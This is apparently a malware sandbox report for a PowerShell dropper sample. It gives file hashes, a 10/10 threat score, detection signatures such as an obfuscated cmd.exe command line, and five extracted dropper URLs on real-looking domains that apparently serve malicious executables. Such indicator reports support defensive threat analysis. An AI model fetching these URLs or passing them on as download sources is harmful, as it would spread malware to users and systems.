General

  • Target

    c131bb851593a57ab89577b5bb927ee4e3cd0c31140a775e871c1463f50d2fbf

  • Size

    112KB

  • Sample

    220731-k69ecshef2

  • MD5

    bb7ac1a1873e29db1f7ad69aaf4a8127

  • SHA1

    e7a082ff41d8cc4a09d3f852c46cfb808659b476

  • SHA256

    c131bb851593a57ab89577b5bb927ee4e3cd0c31140a775e871c1463f50d2fbf

  • SHA512

    9bd8f53a8dc5bf852ce2b59f9ab697022679b1d167311c437bb56b6509a6a6c81aafd2092f88ec2e87eca5172fb022224b784d4238200a1cf33eace07ea575dd

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://solvolab.com/sdB

exe.dropper

http://kenstones.com/pR

exe.dropper

http://benvisuals.com/S2hMkKS

exe.dropper

http://www.clinicacirurgiaplasticasp.com.br/Jmz

exe.dropper

http://pride.ge/0e40iT

Targets

    • Target

      c131bb851593a57ab89577b5bb927ee4e3cd0c31140a775e871c1463f50d2fbf

    • Size

      112KB

    • MD5

      bb7ac1a1873e29db1f7ad69aaf4a8127

    • SHA1

      e7a082ff41d8cc4a09d3f852c46cfb808659b476

    • SHA256

      c131bb851593a57ab89577b5bb927ee4e3cd0c31140a775e871c1463f50d2fbf

    • SHA512

      9bd8f53a8dc5bf852ce2b59f9ab697022679b1d167311c437bb56b6509a6a6c81aafd2092f88ec2e87eca5172fb022224b784d4238200a1cf33eace07ea575dd

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • An obfuscated cmd.exe command-line is typically used to evade detection.

MITRE ATT&CK Enterprise v6

Tasks